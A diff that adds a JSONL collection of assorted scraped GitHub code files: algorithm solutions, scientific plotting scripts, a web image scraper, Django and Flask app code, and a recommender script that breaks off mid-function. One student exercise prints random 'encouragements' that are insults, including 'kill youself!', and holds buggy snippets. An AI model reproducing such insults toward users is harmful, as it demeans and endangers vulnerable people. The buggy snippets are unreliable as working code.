diff --git "a/859.jsonl" "b/859.jsonl" new file mode 100644--- /dev/null +++ "b/859.jsonl" @@ -0,0 +1,948 @@ +{"seq_id":"23020228085","text":"class Solution:\n def checkSubarraySum(self, nums: List[int], k: int) -> bool:\n _sum, dic = 0, {0:-1}\n for idx, num in enumerate(nums):\n # k현재까지 합계의 나머지\n _sum = (_sum + num) % k\n # 같은 나머지가 나온다면 이전에 나왔던 위치에서 현재까지 k의 배수가 더해진 것\n # 같은 나머지가 존재하는 위치가 현재 위치와 거리가 2이상이 되어야함:\n if _sum not in dic:\n dic[_sum] = idx\n elif idx - dic[_sum] >= 2:\n return True\n return False","repo_name":"pjaehyun/TIL","sub_path":"PS/leetcode/523.Continuous Subarray Sum.py","file_name":"523.Continuous Subarray Sum.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"10876083205","text":"import random;\n\n# EXCERCISE P1 Q1\ndef exp1q1_encouragement():\n encourage = [\"kill youself!\",\n \"you dishonored your family!\",\n \"you are a disgrace! to the entire humanity\",\n \"you are worthless!\",\n \"no one likes you!\"\n \"shut your computer down and go cry in the corner!\"];\n if str(input(\"would you like an encouragement to brighten up your day? (y/n) \")).lower() == \"y\":\n print(random.choice(encourage));\n\n# EXCERCISE P1 Q2\ndef exp1q2_daysOfWeek():\n days_of_week = [\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\",\n \"Friday\", \"Saturday\", \"Sunday\"];\n while True:\n day_number = input(\\\n \"\"\"\n[1] Monday\n[2] Tuesday\n[3] Wednesday\n[4] Thursday\n[5] Friday\n[6] Saturday\n[7] Sunday\\n\"\"\");\n try:\n day_number = int(day_number);\n print(\"\\n\", days_of_week[day_number - 1]);\n break;\n except:\n None;\n\n# EXCERCISE P1 Q3\ndef exp1q3_stringSlice():\n q3_str = \"bothering\";\n print(\"\\n\\n\", q3_str[0:4], \"\\n\",\n q3_str[0:3], \"\\n\",\n q3_str[0:6], \"\\n\",\n q3_str[1:6], \"\\n\",\n q3_str[2:5], \"\\n\",\n q3_str[3:6], \"\\n\",\n q3_str[5:9], \"\\n\",\n q3_str[6:8]);\n\n# EXCERCISE P2 Q1\ndef exp2q1_createList_daysOfWeek():\n \"\"\" Create a list of the days of the week. \"\"\";\n days = [\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\",\n \"Friday\", \"Saturday\", \"Sunday\"];\n\n# EXCERCISE P2 Q2\ndef exp2q2_100():\n \"\"\" Create a string of 100 question marks. \"\"\";\n question_str = \"?\" * 100;\n\n# EXCERCISE P2 Q3\ndef exp2q3_asterisks():\n \"\"\" With one line of code print out a row of 50 asterisks '*'. \"\"\";\n print(\"*\" * 50);\n\n# EXCERCISE P2 Q4\ndef exp2q4_testMarks():\n \"\"\" Create a list of 5 test marks entered by the user. \"\"\";\n mark_list = []\n for i in range(5):\n mark_list.append(int(input(\"Test mark for test\", i + 1)));\n print(mark_list);\n\n# EXCERCISE P3 Q1\ndef exp3q1_addFive():\n \"\"\" Create a list and write a function that will add 5 to every\n element in the list. \"\"\";\n number_list = [4, 8, 15, 16, 23, 42];\n for i in len(number_list):\n number_list[i - 1] += 5;\n print(number_list);\n\n# EXCERCISE P3 Q2\ndef exp3q2_100randomgen():\n default_list = [];\n even_list = [];\n for i in range(100):\n default_list.append(random.randrange(0, 11));\n\n for j in default_list:\n if j % 2 == 0:\n even_list.append(j);\n\n print(even_list);\n\n# EXCE\n \n \n \nexp1q1_encouragement();\nexp1q2_daysOfWeek();\nexp1q3_stringSlice();\n","repo_name":"FSXAC/PythonSandbox","sub_path":"Harry Ainlay/Assignment - Data Structure Excercises.py","file_name":"Assignment - Data Structure Excercises.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"15377870673","text":"import urllib.request\nimport re\nimport os\n\ndef imageCrawler(url,toPath):\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\"\n }\n req = urllib.request.Request(url,headers=headers)\n response = urllib.request.urlopen(req)\n htmlStr = response.read().decode(\"utf-8\")\n #with open(r\"/Users/jinpeihua/PycharmProjects/Python语言基础视频课程/入门教程一/网络爬虫/file/1haodian.html\",\"wb\") as f:\n #f.write(htmlStr)\n\n pat = r'
\\n'\n re_image = re.compile(pat,re.S)\n imageList = re_image.findall(htmlStr)\n #print(imageList)\n num = 1\n for imageUrl in imageList:\n path = os.path.join(toPath,str(num)+\".jpg\")\n num += 1\n #把图片下载到本地\n urllib.request.urlretrieve(\"http://\"+imageUrl,filename=path)\n\n\nurl = \"http://search.yhd.com/c9719-0-0/mbname-b/a-s1-v0-p1-price-d0-f0-m1-rt0-pid-mid0-color-size-k/\"\ntoPath = \"/Users/jinpeihua/PycharmProjects/Python语言基础视频课程/入门教程一/网络爬虫/file/image\"\n\nimageCrawler(url,toPath)","repo_name":"LasterSmithKim/Python-Base","sub_path":"网络爬虫/爬虫练习/1.屌丝扒女装.py","file_name":"1.屌丝扒女装.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1786828754","text":"import bz2\nimport glob\nimport os\nimport pathlib\nimport warnings\n\nimport numpy as np\nimport pandas as pd\n\nfrom scipy import stats\nfrom matplotlib import pyplot as plt\n\n\ndef get_IMF_data(year_range):\n \"\"\"\n Get OMNI IMF data\n\n Note: IMF data should be pickled with pickle_imf() before calling this.\n An error is raised if no pickled data is found.\n\n Please see pickle_imf() for a more complete description of IMF data and its origins\n\n :param year_range: (int, int):\n Inclusive. The year range to consider.\n\n :return: pandas.Date_Frame:\n A dataframe with the requested data.\n \"\"\"\n\n loc_root = str((pathlib.Path().parent.absolute()))\n if \"data_getters\" in loc_root:\n # We are calling from within lib/data_getters\n loc_root = str((pathlib.Path().parent.absolute().parent.absolute().parent.absolute()))\n if \"lib\" in loc_root:\n # We are calling from within lib\n loc_root = str((pathlib.Path().parent.absolute().parent.absolute()))\n\n in_dir = loc_root + \"/data/omni\"\n print(\"Looking for a pickled file in: \" + in_dir)\n\n for in_file in glob.iglob(in_dir + \"/*.pbz2\"):\n file_name = str(os.path.basename(in_file))\n\n try:\n # Try to pull the required information our of the filename\n file_year_start = int(file_name[9:13])\n file_year_end = int(file_name[14:18])\n\n # Lets see if this file will do the trick\n if file_year_start <= year_range[0] and file_year_end >= year_range[1]:\n # We are good, go ahead and read in the data\n\n warnings.warn(\"Using IMF data from \" + in_file, category=Warning)\n data_stream = bz2.BZ2File(in_file, \"rb\")\n return pd.read_pickle(data_stream)\n\n else:\n continue # This file is not what we are looking for\n except BaseException as e:\n print(\"Base exception encountered: \" + str(e))\n pass\n\n # If we didn't find anything, then we can just go ahead and return None\n raise FileNotFoundError(\"get_IMF_data() could not find a pickled IMF datafile with information from \"\n + str(year_range[0]) + \" to \" + str(year_range[1])\n + \". Please pickle data for the desired range using pickle_imf()\")\n\n\nif __name__ == \"__main__\":\n \"\"\" Testing \"\"\"\n\n # Most of the IMF data in both by and bz in the range of -5 to 5 nT\n\n year_range = (2014, 2021)\n\n df = get_IMF_data(year_range=year_range)\n\n print(df.keys())\n\n print(\"\")\n print(\"Minimum Bx value: \" + str(np.min(df['Bx_nT'])) + \" nT (GSM)\")\n print(\"Maximum Bx value: \" + str(np.max(df['Bx_nT'])) + \" nT (GSM)\")\n\n print(\"\")\n print(\"Minimum By value: \" + str(np.min(df['By_nT_GSM'])) + \" nT (GSM)\")\n print(\"Maximum By value: \" + str(np.max(df['By_nT_GSM'])) + \" nT (GSM)\")\n\n print(\"\")\n print(\"Minimum Bz value: \" + str(np.min(df['Bz_nT_GSM'])) + \" nT (GSM)\")\n print(\"Maximum Bz value: \" + str(np.max(df['Bz_nT_GSM'])) + \" nT (GSM)\")\n\n print(\"\")\n print(\"Starting datetime: \" + str(df['datetime'].iat[0]))\n print(\"Ending datetime: \" + str(df['datetime'].iat[-1]))\n\n print(\"\")\n print(\"Temporal data resolution is: \" + str(df['datetime'].iat[1] - df['datetime'].iat[0]))\n\n\n \"\"\" Quickly plot the data so we can look at the spread \"\"\"\n fig, ax = plt.subplots(figsize=[6, 6], nrows=1, ncols=1, constrained_layout=True, dpi=300)\n\n # Compute By edges\n n_bins_x = 40\n by_edges = np.linspace(-10, 10, num=(n_bins_x + 1))\n\n # Compute By edges\n n_bins_y = 40\n bz_edges = np.linspace(-10, 10, num=(n_bins_y + 1))\n\n result, _, _, _ = stats.binned_statistic_2d(df['By_nT_GSM'], df['Bz_nT_GSM'], values=None, statistic='count',\n bins=[by_edges, bz_edges])\n\n plot = ax.pcolormesh(by_edges, bz_edges, result.transpose(), cmap='jet', zorder=0)\n cbar = fig.colorbar(plot, ax=ax, orientation=\"vertical\")\n\n # ax.scatter(df['By_nT_GSM'], df['Bz_nT_GSM'])\n ax.set_xlabel(\"By [nT] (GSM)\")\n ax.set_ylabel(\"Bz [nT] (GSM)\")\n ax.set_title(\"IMF Data Spread\")\n\n plt.show()\n plt.close(fig)\n\n\n \"\"\" Plot year vs IMF so we can see how fast it changes \"\"\"\n x_lim = (2014, 2015)\n\n fig, ax = plt.subplots(figsize=[6, 8], nrows=2, ncols=1, constrained_layout=True, dpi=300)\n fig.suptitle(\"IMF Data Time Evolution\")\n\n # Compute decimal years to plot along x\n print(\"\\nComputing decimal times...\")\n hours_in_a_day = 24\n months_in_a_year = 12\n days_in_a_year = 365\n hours_in_a_year = 8760\n decimal_year, decimal_day = [], []\n for i in range(len(df)):\n datetime_obj_here = df['datetime'].iat[i]\n\n decimal_day_here = datetime_obj_here.day \\\n + (datetime_obj_here.hour + datetime_obj_here.minute / 60) / hours_in_a_day\n\n decimal_year_here = datetime_obj_here.year + (datetime_obj_here.month - 1) / months_in_a_year \\\n + decimal_day_here / days_in_a_year\n\n decimal_day.append(decimal_day_here)\n decimal_year.append(decimal_year_here)\n\n df['decimal_day'] = np.asarray(decimal_day)\n df['decimal_year'] = np.asarray(decimal_year)\n\n print(\"Decimal year max: \" + str(np.amax(df['decimal_year'])))\n print(\"Decimal year min: \" + str(np.amin(df['decimal_year'])))\n\n # Plot the y-component on the first subplot\n ax[0].set_ylabel(\"By [nT] (GSM)\")\n ax[0].set_xlabel(\"Year\")\n ax[0].set_xlim(x_lim)\n ax[0].plot(df['decimal_year'], df['By_nT_GSM'])\n\n # Plot the z-component on the second subplot\n ax[1].set_ylabel(\"Bz [nT] (GSM)\")\n ax[1].set_xlabel(\"Year\")\n ax[1].set_xlim(x_lim)\n ax[1].plot(df['decimal_year'], df['Bz_nT_GSM'])\n\n plt.show()\n plt.close(fig)\n\n\n \"\"\" Plot a couple days of IMF data \"\"\"\n\n fig, ax = plt.subplots(figsize=[6, 12], nrows=8, ncols=1, constrained_layout=True, dpi=300)\n fig.suptitle(\"IMF Data Time Evolution\")\n\n for i in range(ax.size):\n ax[i].set_ylabel(\"Bz [nT] (GSM)\")\n ax[i].set_xlabel(\"Day\")\n\n df_dd = df[(df['year'] == 2016) & (df['month'] == 1) & (df['day'] == i + 1)]\n ax[i].plot(df_dd['decimal_day'], df_dd['Bz_nT_GSM'])\n\n plt.show()\n plt.close(fig)\n\n\n\n","repo_name":"mrl280/Summer2021PythonWork","sub_path":"DataAnalysis/EchoOccurrence/lib/data_getters/get_IMF_data.py","file_name":"get_IMF_data.py","file_ext":"py","file_size_in_byte":6281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42100180193","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 12 18:20:02 2019\r\n\r\n@author: Qixin\r\n\"\"\"\r\nimport pandas as pd\r\nimport os\r\nimport glob\r\nimport cv2\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.stats import zscore\r\n#%%\r\npathname=r'Y:\\ChenHaoshan\\11. fiber photometry\\Qixin Yang'\r\nsig_df=pd.read_csv(os.path.join(pathname,'#191113_conditioning.csv'))\r\nbehav_df=pd.read_csv(os.path.join(pathname,'#191113_conditioning_XY.csv')) \r\nextensions=('*.asf','*.avi','*.mp4')\r\nvideos=[]\r\nfor extension in extensions:\r\n videos.append(glob.glob(pathname+'/'+extension)) \r\nvideofile=sorted(videos)[-1][0] \r\n \r\n#%%\r\nsigz=zscore(sig_df['RawF_1'])\r\nplt.figure()\r\nplt.plot(sigz)\r\n#%%\r\nbehav_df=behav_df[:-1]\r\noutput_video=os.path.join(pathname,'sig.avi') \r\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\r\nout = cv2.VideoWriter(output_video,fourcc,30,(640,480)) \r\ncap=cv2.VideoCapture(videofile)\r\nrect,frame=cap.read()\r\nengram=np.zeros(np.shape(frame))\r\ncap.release()\r\ncap=cv2.VideoCapture(videofile)\r\ni=0\r\nratio=0.12\r\nanimal_size=10\r\nwhile(cap.isOpened()):\r\n rect,frame=cap.read()\r\n if rect==True:\r\n if sigz[i]>=2:\r\n frame=cv2.circle(frame,(int(behav_df['X'][i]/ratio), int(behav_df['Y'][i]/ratio)),int(sigz[i]),(0,255,0), -1)\r\n engram[int(behav_df['Y'][i]/ratio)-animal_size:int(behav_df['Y'][i]/ratio)+animal_size,\r\n int(behav_df['X'][i]/ratio)-animal_size:int(behav_df['X'][i]/ratio)+animal_size,\r\n 0]+=int(sigz[i])*5\r\n frame=cv2.addWeighted(frame,1,engram.astype('uint8'),1,0)\r\n out.write(frame)\r\n \r\n cv2.imshow('frame',frame)\r\n i+=1\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n else:\r\n break\r\ncap.release()\r\nout.release()\r\ncv2.destroyAllWindows() ","repo_name":"showholic/Ephy_python-","sub_path":"Ephy_python/Haoshan_photometry/photometry_video.py","file_name":"photometry_video.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31396274769","text":"from django.forms import ModelForm, Select, TextInput\n\nfrom controle_estagios.models import Empresas\nfrom .validacoes import valida_tamanho_string, valida_cnpj, valida_cep, PAISES\n\n\nclass FormEmpresas(ModelForm):\n\n def clean_nome(self):\n nome = self.cleaned_data['nome']\n return valida_tamanho_string('NOME', nome, 3, 150)\n\n def clean_cnpj(self):\n cnpj = self.cleaned_data['cnpj']\n return valida_cnpj(cnpj)\n\n def clean_cep(self):\n cep = self.cleaned_data['cep']\n return valida_cep(cep)\n\n def clean_endereco(self):\n endereco = self.cleaned_data['endereco']\n return valida_tamanho_string('ENDEREÇO', endereco, 3, 150)\n\n def clean_bairro(self):\n bairro = self.cleaned_data['bairro']\n return valida_tamanho_string('BAIRRO', bairro, 3, 50)\n\n def clean_cidade(self):\n cidade = self.cleaned_data['cidade']\n return valida_tamanho_string('CIDADE', cidade, 3, 30)\n\n def clean_fone(self):\n fone = self.cleaned_data['fone']\n return valida_tamanho_string('TELEFONE', fone, 0, 13)\n\n class Meta:\n model = Empresas\n fields = '__all__'\n widgets = {\n 'pais': Select(choices=PAISES, attrs={'class': 'form-control'}),\n 'nome': TextInput(attrs={'class': 'form-control', 'placeholder': 'nome'}),\n 'cnpj': TextInput(attrs={'class': 'form-control cnpj-mask', 'placeholder': '00.000.000/0001-00'}),\n 'fone': TextInput(attrs={'class': 'form-control fone-mask', 'placeholder': '(00)0000-0000'}),\n 'cep': TextInput(attrs={'class': 'form-control cep-mask', 'placeholder': '00000-000'}),\n 'endereco': TextInput(attrs={'class': 'form-control', 'placeholder': 'Rua dos bobos'}),\n 'bairro': TextInput(attrs={'class': 'form-control'}),\n 'cidade': TextInput(attrs={'class': 'form-control'}),\n 'complemento': TextInput(attrs={'class': 'form-control', 'placeholder': 'Nº 0'})\n }\n","repo_name":"jefethibes/Estagios","sub_path":"controle_estagios/forms/empresas.py","file_name":"empresas.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"4942357308","text":"\n\ndef return_way(mask, last, p, cities):\n if not mask:\n return\n\n return_way(mask - (1 << last), p[mask][last], p, cities)\n cities.append(last + 1)\n return cities\n\n\ndef find_last_city(f, n, p):\n k = len_way = 0\n for i in range(1, n):\n if f[(1 << n) - 1][i] < f[(1 << n) - 1][k]:\n k = i\n len_way = f[(1 << n) - 1][k]\n way = return_way((1 << n) - 1, k, p, [])\n return len_way, way\n\n\ndef tsp(n, a):\n f = [[float('inf')] * n for _ in range(1 << n)]\n p = [[0] * n for _ in range(1 << n)]\n\n for mask in range(1, 1 << n):\n for k in range(0, n):\n if mask == (1 << k):\n f[mask][k] = 0\n\n if mask & (1 << k):\n pm = mask - (1 << k)\n\n for i in range(1, n):\n if f[pm][i] + a[i][k] < f[mask][k]:\n f[mask][k] = f[pm][i] + a[i][k]\n p[mask][k] = i\n\n return find_last_city(f, n, p)\n\n\n\n\n","repo_name":"tfcp68/manual-projects","sub_path":"Исходники/Глава 2. Часть 2/Динамическое программирование2/На множествах/7. Коммивояжёр/Python/TSP.py","file_name":"TSP.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6741728055","text":"import datetime\nfrom flask import current_app\nfrom application.admin.models.shipment_weight import ShipmentPrice\nfrom application.admin.models.shipment_spending import ShipmentSpending, db\nimport logging\nimport pandas as pd\nfrom flask import flash\nfrom flask import render_template\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, HiddenField, IntegerField, DateField, FloatField\nfrom application.utils.utils import to_yyyymmdd\n\n\nclass ShipmentSpendingForm(FlaskForm):\n date = DateField(\"Date\", render_kw={\"class\": \"form-control\"}, format='%Y%m%d')\n weight = FloatField(\"Weight\", render_kw={\"class\": \"form-control\", \"pattern\": \"[0-9]+([\\.,][0-9]+)?\", \"step\": \"0.01\"})\n submit = SubmitField(\"Submit\", render_kw={\"class\": \"btn bnt-lg btn-dark\"})\n\n\nclass ShipmentSpendingController:\n def __init__(self):\n shipment_prices = ShipmentPrice.query.filter(ShipmentPrice.end == None).all()\n current_app.logger.info(f\"below are retrieved shipment prices : {shipment_prices}\")\n if len(shipment_prices) > 0:\n self.shipment_per_kg_price = shipment_prices[0].price\n else:\n self.shipment_per_kg_price = 2000\n\n def show_all_spendings(self):\n records = ShipmentSpending.query.order_by(ShipmentSpending.date.desc()).all()\n df = pd.read_sql(ShipmentSpending.query.statement, ShipmentSpending.query.session.bind)\n total_amount = df['amount'].sum()\n return render_template(\"shipment_spending/shipment_spending_main.html\", records=records, total_amount=total_amount, title=\"Shipment spendings\")\n\n def add_shipment_spending(self):\n form = ShipmentSpendingForm()\n if form.validate_on_submit():\n date = form.date.data\n weight = form.weight.data\n amount = weight * self.shipment_per_kg_price\n new_record = ShipmentSpending(date=date, weight=weight, amount=amount)\n db.session.add(new_record)\n db.session.commit()\n flash(f\"Successfully added {date}, {weight}, {amount}\", \"success\")\n return self.show_all_spendings()\n form.date.data = datetime.date.today()\n return render_template(\"shipment_spending/shipment_spending_add.html\", form=form, title=\"Add shipment spending\")\n\n def edit_shipment_spending(self, id):\n record = ShipmentSpending.query.get(id)\n form = ShipmentSpendingForm()\n if form.validate_on_submit():\n date = form.date.data\n weight = form.weight.data\n amount = weight * self.shipment_per_kg_price\n record.date = date\n record.weight = weight\n record.amount = amount\n db.session.commit()\n flash(f\"Updated to {date},{weight},{amount}\", \"success\")\n return self.show_all_spendings()\n form.date.data = record.date\n form.weight.data = record.weight\n return render_template(\"shipment_spending/shipment_spending_edit.html\", form=form, title=\"Edit shipment spending\")\n\n def remove_shipment_spending(self, id):\n record = ShipmentSpending.query.get(id)\n db.session.delete(record)\n db.session.commit()\n flash(f\"Removed id {id}\", \"success\")\n return self.show_all_spendings()\n","repo_name":"samrullo/jspanda_business","sub_path":"application/admin/controllers/shipment_spending_controller.py","file_name":"shipment_spending_controller.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"70786045632","text":"#!/usr/bin/env python3\n\nimport argparse\nimport numpy as np\nfrom scipy.special import comb\n\nnp.seterr(all='raise')\n\n\ndef get_combo_rec(l, t, r):\n # base case 1: less than 2 ref\n if l[-1][0] < 2:\n return\n # base case 2: negative alt\n elif l[-1][1] < 0:\n return\n # base case 3: true combination\n elif len(l) == t:\n r.append(l[1:])\n return\n # recursive case\n else:\n # substract blue\\ref\n get_combo_rec(l + [(l[-1][0] - 1, l[-1][1])], t, r)\n # substract red\\alt\n get_combo_rec(l + [(l[-1][0], l[-1][1] - 1)], t, r)\n return r\n\n\ndef get_prob_rec(k, n, a, s, p, inv=-1):\n # base case 1: negative alt\n if k < 0:\n pass\n # base case 2: less than 2 ref\n elif n == 2 and k != 0:\n pass\n elif n - k < 1:\n pass\n else:\n if inv == 0:\n s_plus = np.log((1-a) * k + a * (n - k)) - np.log(n)\n elif inv == 1:\n s_plus = np.log((1-a) * (n - k) + a * k) - np.log(n)\n else:\n s_plus = 0\n # base case 0: too unlikely, prob nearly 0\n if s + s_plus < -20:\n p.append(s + s_plus)\n # base case 3: true combination\n elif n == 2 and k == 0:\n p.append(s + s_plus)\n # recursive case\n else:\n # substract blue\\ref\n get_prob_rec(k, n - 1, a, s + s_plus, p, inv=1)\n # substract red\\alt\n get_prob_rec(k - 1, n - 1, a, s + s_plus, p, inv=0)\n return p\n\n\ndef log_sum(x):\n m = np.max(x)\n s = 0\n for x_i in x:\n if x_i != m:\n s += np.exp(x_i - m)\n return m + np.log1p(s)\n\n\ndef log_norm(x):\n max_i = np.argmax(x)\n x_exp = np.exp(x[np.arange(x.size) != max_i] - x[max_i])\n x_norm = x - x[max_i] - np.log1p(np.sum(x_exp))\n return np.exp(np.clip(x_norm, None, 0))\n\n\ndef get_prob(k, n, a):\n # start = np.log((1-a) * (n - k) + a * k) - np.log(n)\n x = get_prob_rec(k, n, a, 0, [])\n if len(x) > 0:\n return np.exp(log_sum(x))\n else:\n return 0\n\n\ndef get_prob_short(k, n, a):\n no_comb = np.log(comb(n - 2, k))\n try:\n prob_no_error = (n - k - 2) * np.log(1 - a) \\\n + np.log(np.arange(2, n-k)).sum()\n prob_error = np.log(np.arange(0, k) * (1 - a) + (n - k) * a).sum()\n except:\n import pdb; pdb.set_trace()\n norm = np.log(np.arange(2, n)).sum()\n return np.exp(no_comb + prob_no_error + prob_error - norm)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-k', type=int, default='', help='# alt reads')\n parser.add_argument('-n', type=int, help='# total reads.')\n parser.add_argument('-a', type=float, default=0.001, help='Ampl. error rate.')\n\n args = parser.parse_args()\n return args\n\n\nif __name__ == '__main__':\n args = parse_args()\n\n print(f'Exact: {get_prob(args.k, args.n, args.a):6f}')\n print(f'Upper bound: {get_prob_short(args.k, args.n, args.a):6f}')\n exit()\n p_all = np.zeros((args.n-1, 2))\n for k in range(0, args.n-1, 1):\n p_all[k, 0] = get_prob(k, args.n, args.a)\n p_all[k, 1] = get_prob_short(k, args.n, args.a)\n print(f'p({k: >2}|{args.n}) = {p_all[k, 0]:.6f}\\t'\n f'(upper bound: {p_all[k, 1]:.6f})')\n print(f'\\nsum: {np.sum(p_all, axis=0)[0]:6f}')","repo_name":"cbg-ethz/scSomMerClock","sub_path":"AnalysisPipelines/scripts/plotting/etc/ampl_error.py","file_name":"ampl_error.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"2831296483","text":"import numpy as np\r\nimport pandas as pd\r\nimport os.path\r\nfrom random import randint\r\nfrom tqdm import tqdm\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport uuid\r\nimport time\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\n### NOTES\r\nThis file is an example of what your code should look like. It is written in Python 3.6.\r\nTo know more about the expectations, please refer to the guidelines.\r\n\"\"\"\r\n\r\n#####\r\n##\r\n# DATA IMPORT\r\n##\r\n#####\r\n\r\n\r\n# Where data is located\r\nmovies_file = '../data/movies.csv'\r\nusers_file = '../data/users.csv'\r\nratings_file = '../data/ratings.csv'\r\npredictions_file = '../data/predictions.csv'\r\nsubmission_file = '../data/submission.csv'\r\n\r\n# Read the data using pandas\r\nmovies_description = pd.read_csv(movies_file, delimiter=';',\r\n dtype={'movieID': 'int',\r\n 'year': 'int', 'movie': 'str'},\r\n names=['movieID', 'year', 'movie'])\r\nusers_description = pd.read_csv(users_file, delimiter=';',\r\n dtype={'userID': 'int',\r\n 'gender': 'str',\r\n 'age': 'int',\r\n 'profession': 'int'},\r\n names=['userID', 'gender',\r\n 'age', 'profession'])\r\nratings_description = pd.read_csv(ratings_file, delimiter=';',\r\n dtype={'userID': 'int',\r\n 'movieID': 'int',\r\n 'rating': 'int'},\r\n names=['userID', 'movieID', 'rating'])\r\npredictions_description = pd.read_csv(predictions_file, delimiter=';',\r\n names=['userID', 'movieID'], header=None)\r\n\r\n# The ratings dataframe is missing some movies -\r\n# meaning some movies were not rated by anyone.\r\n# We fix this by joining movies dataframe with\r\n# ratings dataframe and filling the nan values with 0's.\r\nratings = (movies_description.set_index(\"movieID\")).join(\r\n ratings_description.pivot(index='movieID', columns='userID', values='rating'))\r\nratings.drop(['year', 'movie'], axis=1, inplace=True)\r\nratings = ratings.fillna(0)\r\n\r\n#####\r\n##\r\n# COLLABORATIVE FILTERING\r\n##\r\n# In hindsight we want movie-movie collab. filtering.\r\n# For movie x find two other most-similar movies .\r\n# Predict rating x based on neighbours.\r\n#####\r\n\r\n\r\ndef predict_collaborative_filtering(movies, users, ratings, predictions):\r\n # 1. Create a user/movie matrix containing all of the ratings\r\n\r\n # Collaborative filtering can be done in 2 ways: user-item and item-item.\r\n # An easy way to switch between User-Item CF and Item-Item CF:\r\n user_item = True\r\n\r\n # If user_item is true, we have a matrix where rows are users and columns\r\n # are movies. The first row of this matrix has ratings\r\n # of user 1 for movies 1-3695\r\n # If user_item is false, then we have a matrix where rows are movies and\r\n # columns are users. The first row of this matrix has ratings of\r\n # movie 1 for users 6040\r\n\r\n if(user_item):\r\n ratings_matrix = ratings.to_numpy().T\r\n else:\r\n ratings_matrix = ratings.to_numpy()\r\n\r\n # 2. Compute the utility matrix containing the similarities\r\n # between users (user_item) or items (item_item)\r\n\r\n # Value of user_item\r\n # similarity_matrix[i][j] = similarity between user i and user j\r\n # similarity_matrix = np.corrcoef(ratings_matrix)\r\n\r\n if (user_item):\r\n similarity_matrix = ratings_matrix.dot(ratings_matrix.T) + 1e-9\r\n else:\r\n similarity_matrix = ratings_matrix.T.dot(ratings_matrix) + 1e-9\r\n norms = np.array([np.sqrt(np.diagonal(similarity_matrix))])\r\n similarity_matrix = similarity_matrix / norms / norms.T\r\n print(similarity_matrix)\r\n\r\n # 3. Compute predictions\r\n if(user_item):\r\n prediction_matrix = similarity_matrix.dot(\r\n ratings_matrix)/np.array([np.abs(similarity_matrix).sum(axis=1)]).T\r\n else:\r\n prediction_matrix = (ratings_matrix.dot(\r\n similarity_matrix)/np.array(\r\n [np.abs(similarity_matrix).sum(axis=1)])).T\r\n # print(predictidon_matrix)\r\n # Creating the final predictions format\r\n number_predictions = len(predictions)\r\n final_predictions = [[idx+1, prediction_matrix[predictions.userID[idx]-1,\r\n predictions.movieID[idx]-1]]\r\n for idx in range(0, number_predictions)]\r\n\r\n return final_predictions\r\n\r\n\r\n#print(predict_collaborative_filtering(\r\n# movies_description,\r\n# users_description,\r\n# ratings_full,\r\n# predictions_description)[0])\r\n\r\n\r\ndef central_cosine_distance(vecA, vecB):\r\n \"\"\"\r\n Calculates Pearsons Correlation between two vectors.\r\n :param vecA: list\r\n :param vecB: list\r\n :return: float\r\n \"\"\"\r\n # meanA = np.mean(vecA)\r\n # meanB = np.mean(vecB)\r\n # sum_numerator = np.sum((vecA - meanA) * (vecB - meanB))\r\n # sum_denominator = np.sqrt(np.sum((vecA - meanA) ** 2)) * np.sqrt(np.sum((vecB - meanB) ** 2))\r\n #\r\n # return sum_numerator/sum_denominator\r\n\r\n # Visa sita padaro np.corrcoef funkcija\r\n return np.corrcoef(vecA, vecB)\r\n\r\n\r\n# print(central_cosine_distance([-2.6, 0, -0.6, 0, -0.6, 0, 0, -1.6, 0, 0, 0.4, 0],\r\n# [-2.6, 0, -0.6, 0, -0.6, 0, 0, -1.6, 0, 0, 0.4, 1]))\r\n\r\ndef predict_rating(s, r):\r\n \"\"\"\r\n Predict rating by taking weighted average of neighbour ratings.\r\n :param s: list\r\n Closest neighbour similarities.\r\n :param r:\r\n Closes neighbour actual ratings for item we want to predict.\r\n :return:\r\n \"\"\"\r\n\r\n sumNumerator = np.sum(np.dot(s, r).ravel())\r\n sumDenominator = np.sum(s)\r\n # Baseline estimate should be added here!!! (baselineEst = overall_mean_rating\r\n # + rating_deviation_of_user\r\n # + (avg. rating of movie - mean))\r\n return sumNumerator/sumDenominator\r\n\r\n#print(predict_rating([0.41, 0.59], [2, 3]))\r\n\r\n#####\r\n##\r\n# LATENT FACTORS\r\n##\r\n#####\r\n\r\n#-------------------------------------------------Util---------------------------------------------------\r\ndef grid_search(samples, R, b, steps=500, gamma=0.01, lamda=0.01, rmse = False, bias = False):\r\n \"\"\"\r\n Perfomrs grid search to find the best pair of hyper paramters k and learning_rate\r\n \"\"\"\r\n\r\n 